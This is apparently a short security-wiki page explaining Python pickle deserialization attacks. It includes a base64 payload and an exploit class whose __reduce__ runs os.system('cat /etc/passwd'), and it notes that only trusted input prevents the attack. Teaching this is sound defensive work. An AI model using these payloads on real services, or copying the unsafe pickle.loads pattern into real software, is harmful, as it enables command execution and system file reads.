Pickle

Exploitation

The example below is a vulnerable pickle code that can be exploited.

import pickle

# Input can be base64 encoded of a file with it's content
user_input = "Y3Bvc2l4CnN5c3RlbQpwMAooUydjYXQgL2V0Yy9wYXNzd2QnCnAxCnRwMgpScDMKLg=="
pickle.loads(base64.b64decode(user_input))

If an attacker is able to create a python object with a shellcode in it's __reduce__ function, pickle will execute the shellcode.

This vulnerability is present in the pickle.loads() function.

The following code is an exploit example to the pickle vulnerability. 

import pickle

shellcode = 'cat /etc/passwd'

class Exploit(object):
    def __reduce__(self):
        return (os.system, (shellcode, ))


exploit = pickle.dumps(Exploit())
print(base64.b64encode(exploit).decode())

Fix

Unfortunately there is no remediation to this issue other than only use trusted data inputs.

PreviousData DeserializationNextXML

Last updated